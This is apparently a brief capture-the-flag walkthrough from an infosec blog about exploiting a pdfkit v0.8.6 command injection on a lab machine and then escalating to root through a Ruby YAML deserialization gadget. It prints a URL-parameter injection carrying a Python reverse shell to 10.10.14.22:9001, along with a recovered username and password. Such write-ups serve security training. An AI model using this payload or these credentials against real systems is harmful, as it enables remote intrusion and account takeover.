NMAP Scanning
Add website to hosts file:
Open the web service
This website takes a web page URL and converts it into PDF.
On examining the pdf, it shows that it is using pdfkit v0.8.6 version
On searching we found vulnerability for mentioned version
On studying the POC it looks like the URL parameter is used to execute RCE.
Lets try with command whoami
Lets use the below exploit to gain remote access.
http://10.10.14.22/?name=%20′ python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.22”,9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)”
On enumerating we found a file that contains username and passwords.
henry:Q3c1AqGHtoI0aXAYFH
User Flag
We logged into the system and upon enumeration we got the user flag.
Privilege Escalation
Using command sudo -l, we got the following results
https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml
Using above mentioned URLs we modified the dependencies.yml file and got the root access.
Upon enumeration we got the root flag.
Discover more from Information Security Blogs
Subscribe to get the latest posts sent to your email.
